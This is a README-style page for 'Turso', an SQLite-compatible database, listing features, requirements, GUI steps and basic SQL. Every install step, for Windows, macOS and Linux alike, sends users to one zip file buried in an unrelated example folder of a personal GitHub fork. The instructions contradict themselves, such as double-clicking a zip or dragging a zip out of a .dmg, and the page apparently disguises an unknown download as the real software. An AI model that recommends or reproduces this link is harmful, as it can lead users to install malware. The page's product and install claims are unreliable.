Turso is an in-process SQL database that works seamlessly with SQLite. It simplifies data storage for applications, making it easier for users to manage their data without needing deep technical knowledge. Whether you are building a simple project or a more complex application, Turso fits your needs.
- Easy to Use: Turso offers a straightforward interface, making database management simple.
- Compatibility: Works well with existing SQLite databases.
- Lightweight: Designed to run efficiently on various platforms without heavy resource consumption.
- Cross-Platform: Use it on different operating systems, including Windows, macOS, and Linux.
- Built for the Web: Supports WebAssembly for web applications.
- Operating System: Windows 10 or later, macOS 10.14 or later, Linux (most distributions)
- Memory: At least 512 MB of RAM
- Disk Space: Minimum of 50 MB free
- Processor: Any modern processor
-
Visit the Download Page
- To get Turso, go to the Releases Page on GitHub.
-
Download the Latest Version
- Look for the latest version listed at the top. Click on the link to download the appropriate file for your operating system.
-
Install Turso
- After the download completes, locate the downloaded file on your computer.
- Follow the instructions based on your operating system:
- Windows:
- Double-click the
https://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zipfile and follow the prompts.
- Double-click the
- macOS:
- Open the
.dmgfile and draghttps://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zipto your Applications folder.
- Open the
- Linux:
- Extract the
https://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zipfile and follow the instructions in the README for installation.
- Extract the
- Windows:
-
Start Using Turso
- Open the application from your applications folder or start menu.
- Create a new database or import an existing SQLite database to get started.
- Launch Turso.
- Select "Create New Database."
- Choose a name and location for your database.
- Click "Create" to complete the process.
- Open Turso.
- Click "Import Database."
- Navigate to your existing SQLite database file and select it.
- The imported database will now be available for you to use.
Turso supports basic SQL commands, including:
- CREATE TABLE: Create new tables in your database.
- INSERT INTO: Add new data to your tables.
- SELECT: Retrieve data from your tables.
- UPDATE: Modify existing data.
- DELETE: Remove data from your tables.
CREATE TABLE Users (
ID INTEGER PRIMARY KEY,
Name TEXT NOT NULL,
Email TEXT NOT NULL UNIQUE
);For more detailed instructions, you can view the full documentation on the Wiki Page.
If you need help or have questions, feel free to check out the Issues Page. You can also join our discussions to connect with other users.
- GitHub Discussions
- Stack Overflow for general programming questions
Keep track of updates and new features by checking the Release Notes Page.
Turso makes database management easier for everyone, regardless of technical skill. With its simple setup and powerful features, you can focus more on building your applications and less on managing your data. Start using Turso today by downloading it from the Releases Page.